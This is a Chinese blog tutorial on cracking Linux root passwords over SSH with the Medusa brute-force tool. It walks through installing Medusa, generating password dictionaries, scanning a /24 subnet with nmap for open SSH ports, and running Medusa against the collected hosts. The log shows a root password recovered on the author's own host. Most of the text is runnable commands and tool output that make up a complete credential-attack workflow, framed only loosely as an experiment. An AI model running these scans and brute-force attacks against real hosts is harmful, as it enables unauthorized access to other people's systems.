medusa詳細教程

############################################################
#暴力破解linux超級管理員root帳號密碼medusa使用方法整理：
#
#By:nortorm
#
###########################################################
#準備工作：（下載下面軟件）
1 wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
2 wget http://www.libssh2.org/download/libssh2-1.2.6.tar.gz
3 字典庫的問題（此處用mkpasswd舉例）

#正文：
首先安裝libssh2-1.2.6.tar.gz
tar -zxvf libssh2-1.2.6.tar.gz -C /usr/src/
cd /usr/src/libssh2-1.2.6/
./configure ; make ; make install

接着安裝medusa-2.0.tar.gz
tar -zxvf medusa-2.0.tar.gz -C /usr/src/
cd /usr/src/medusa-2.0/
./configure --prefix=$HOME/medusa-2.0 --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes
make ; make install

#字典庫（此處是針對密碼特別複雜的情況討論的，我這裏做實驗用不到這麼複雜。）
[root@www ~]# cat mkpasswd.sh
#!/bin/bash

touch /windows/mkpasswd.txt --此處表示在/windows目錄下創建mkpasswd.txt文件

for i in `seq 1 10000`; --此處表示循環產生10000個密碼

do

mkpasswd -l 8 >>/windows/mkpasswd.txt --此處表示生成密碼重定向到mkpasswd.txt

done

下面來簡單介紹一下常用的參數含義：（man mkpasswd）
[root@www ~]# mkpasswd
oO@0thWi8
[root@www ~]# mkpasswd -l 8
d63tL(aT
[root@www ~]# mkpasswd -l 8 -d 3
8:nnV76W
[root@www ~]# mkpasswd -l 8 -c 2
STm[zj30
[root@www ~]# mkpasswd -l 8 -s 2
Nus8}\6E
[root@www ~]# mkpasswd -l 8 -s 2 -c 2 -C 2
e&{HN26d

usage: mkpasswd [args] [user]

where arguments are:

-l # (length of password, default = 9) 指定密碼的長度，默認是9位數

-d # (min # of digits, default = 2) 指定密碼中數字最少位數，默認是2位

-c # (min # of lowercase chars, default = 2) 指定密碼中小寫字母最少位數，默認是2位

-C # (min # of uppercase chars, default = 2) 指定密碼中大寫字母最少位數，默認是2位

-s # (min # of special chars, default = 1) 指定密碼中特殊字符最少位數，默認是1位

-v (verbose, show passwd interaction) 顯示軟件版本

#軟件使用步驟：

[root@www ~]# medusa
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan

這些顯示的一些參數使用信息。

[root@www ~]# medusa -d
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

Available modules in "." :

Available modules in "/usr/local/lib/medusa/modules" :
+ afp.mod : Brute force module for AFP sessions : version 2.0 (No usable LIBAFPFS. Module disabled.)
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ ncp.mod : Brute force module for NCP sessions : version 2.0 (No usable LIBNCP. Module disabled.)
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0 (No usable LIBPQ. Module disabled.)
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0 --關鍵是這個模塊要加載成功，才能做我們的實驗
+ svn.mod : Brute force module for Subversion sessions : version 2.0 (No usable LIBSVN. Module disabled.)
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0

這些信息顯示medusa加載成功的協議模塊。

下面開始分析我們需要的主機IP

[root@www ~]# nmap -sV -p22 -oG ssh 172.16.2.0/24

掃描172.16.2.0/24整個段開了22端口的機器，並且判斷服務版本，保存到ssh文件中。

需要用到nmap工具，nmap用到的幾個參數概析：
usage:nmap

-sV 服務版本

-p22 表示22號端口

-oG 表示將輸出結果保存到

[root@www ~]# cat ssh
# Nmap 5.51 scan initiated Tue Dec 3 17:09:29 2013 as: nmap -sV -p22 -oG ssh 172.16.2.0/24
Host: 172.16.2.1 () Status: Up
Host: 172.16.2.1 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.2 () Status: Up
Host: 172.16.2.2 () Ports: 22/closed/tcp//ssh///
Host: 172.16.2.3 () Status: Up
Host: 172.16.2.3 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.8 () Status: Up
Host: 172.16.2.8 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.9 () Status: Up
Host: 172.16.2.9 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.13 () Status: Up
Host: 172.16.2.13 () Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.17 () Status: Up
Host: 172.16.2.17 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.23 () Status: Up
Host: 172.16.2.23 () Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.25 () Status: Up
Host: 172.16.2.25 () Ports: 22/open/tcp//ssh//Dropbear sshd 2012.55 (protocol 2.0)/
Host: 172.16.2.27 () Status: Up
Host: 172.16.2.27 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.31 () Status: Up
Host: 172.16.2.31 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.34 () Status: Up
Host: 172.16.2.34 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.35 () Status: Up
Host: 172.16.2.35 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.39 () Status: Up
Host: 172.16.2.39 () Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.58 () Status: Up
Host: 172.16.2.58 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.61 () Status: Up
Host: 172.16.2.61 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.64 () Status: Up
Host: 172.16.2.64 () Ports: 22/closed/tcp//ssh///
Host: 172.16.2.66 () Status: Up
Host: 172.16.2.66 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.80 () Status: Up
Host: 172.16.2.80 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.95 () Status: Up
Host: 172.16.2.95 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.119 () Status: Up
Host: 172.16.2.119 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.120 () Status: Up
Host: 172.16.2.120 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.121 () Status: Up
Host: 172.16.2.121 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.122 () Status: Up
Host: 172.16.2.122 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.128 () Status: Up
Host: 172.16.2.128 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.132 () Status: Up
Host: 172.16.2.132 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.133 () Status: Up
Host: 172.16.2.133 () Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.134 () Status: Up
Host: 172.16.2.134 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.135 () Status: Up
Host: 172.16.2.135 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.137 () Status: Up
Host: 172.16.2.137 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.138 () Status: Up
Host: 172.16.2.138 () Ports: 22/closed/tcp//ssh///
Host: 172.16.2.139 () Status: Up
Host: 172.16.2.139 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.144 () Status: Up
Host: 172.16.2.144 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.147 () Status: Up
Host: 172.16.2.147 () Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.150 () Status: Up
Host: 172.16.2.150 () Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.151 () Status: Up
Host: 172.16.2.151 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.165 () Status: Up
Host: 172.16.2.165 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.166 () Status: Up
Host: 172.16.2.166 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.170 (www.nortorm.com) Status: Up
Host: 172.16.2.170 (www.nortorm.com) Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.177 () Status: Up
Host: 172.16.2.177 () Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.179 () Status: Up
Host: 172.16.2.179 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.181 () Status: Up
Host: 172.16.2.181 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.194 () Status: Up
Host: 172.16.2.194 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.196 () Status: Up
Host: 172.16.2.196 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.197 () Status: Up
Host: 172.16.2.197 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.200 () Status: Up
Host: 172.16.2.200 () Ports: 22/closed/tcp//ssh///
Host: 172.16.2.201 () Status: Up
Host: 172.16.2.201 () Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.203 () Status: Up
Host: 172.16.2.203 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.211 () Status: Up
Host: 172.16.2.211 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.218 () Status: Up
Host: 172.16.2.218 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.220 () Status: Up
Host: 172.16.2.220 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.222 () Status: Up
Host: 172.16.2.222 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.227 () Status: Up
Host: 172.16.2.227 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.228 () Status: Up
Host: 172.16.2.228 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.229 () Status: Up
Host: 172.16.2.229 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.237 () Status: Up
Host: 172.16.2.237 () Ports: 22/closed/tcp//ssh///
Host: 172.16.2.240 () Status: Up
Host: 172.16.2.240 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.241 () Status: Up
Host: 172.16.2.241 () Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.245 () Status: Up
Host: 172.16.2.245 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.247 () Status: Up
Host: 172.16.2.247 () Ports: 22/filtered/tcp//ssh///
# Nmap done at Tue Dec 3 17:10:03 2013 -- 256 IP addresses (60 hosts up) scanned in 34.17 seconds

將上面信息的IP提取出來進行整理到ssh1.txt

[root@www ~]# grep 22/open ssh |awk '{print $2}' >>ssh1.txt

[root@www ~]# cat ssh1.txt
172.16.2.1
172.16.2.3
172.16.2.8
172.16.2.9
172.16.2.17
172.16.2.25
172.16.2.27
172.16.2.31
172.16.2.34
172.16.2.35
172.16.2.58
172.16.2.61
172.16.2.66
172.16.2.80
172.16.2.95
172.16.2.119
172.16.2.120
172.16.2.121
172.16.2.122
172.16.2.128
172.16.2.132
172.16.2.134
172.16.2.135
172.16.2.137
172.16.2.139
172.16.2.144
172.16.2.151
172.16.2.165
172.16.2.166
172.16.2.170
172.16.2.179
172.16.2.181
172.16.2.194
172.16.2.196
172.16.2.197
172.16.2.203
172.16.2.211
172.16.2.218
172.16.2.220
172.16.2.222
172.16.2.227
172.16.2.228
172.16.2.229
172.16.2.240
172.16.2.241
172.16.2.245

下面我自己手動創建一個密碼字典（你可以自己去網上找更加好的字典。）以腳本的方式運行
vim mkpasswd.sh

#!/bin/bash
#
#測試字典
#
touch passwd.txt
echo $RANDOM >>passwd.txt --$RANDOM 產生隨機數重定向到passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo 123456 >>passwd.txt --此處是我自己的真實密碼，實驗環境*0*。
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt

chmod +x mkpasswd.sh
./mkpasswd.sh

會自動生成我的測試字典 passwd.txt

[root@www ~]# vim passwd.txt
[root@www ~]# vim mkpasswd.sh
[root@www ~]# chmod +x mkpasswd.sh
[root@www ~]# ./mkpasswd.sh
[root@www ~]# cat passwd.txt
3652
16777
10723
3963
25439
123456
29718
25915
1151
20323
9717

&&下面開始最重要的環節，密碼破解：

[root@www ~]# medusa -H ssh1.txt -u root -P passwd.txt -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 3652 (1 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 16777 (2 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 10723 (3 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 3963 (4 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 25439 (5 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (6 of 11 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.2.170 User: root Password: 123456 [SUCCESS] --此處表示破解成功

當然這個過程是很慢的... 跟你的機器，網絡，字典條目等等都有關係。

medusa詳細教程

我的友情鏈接

medusa詳細教程

medusa詳細教程

我的友情鏈接

Mac下配置sublime實現LaTeX

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結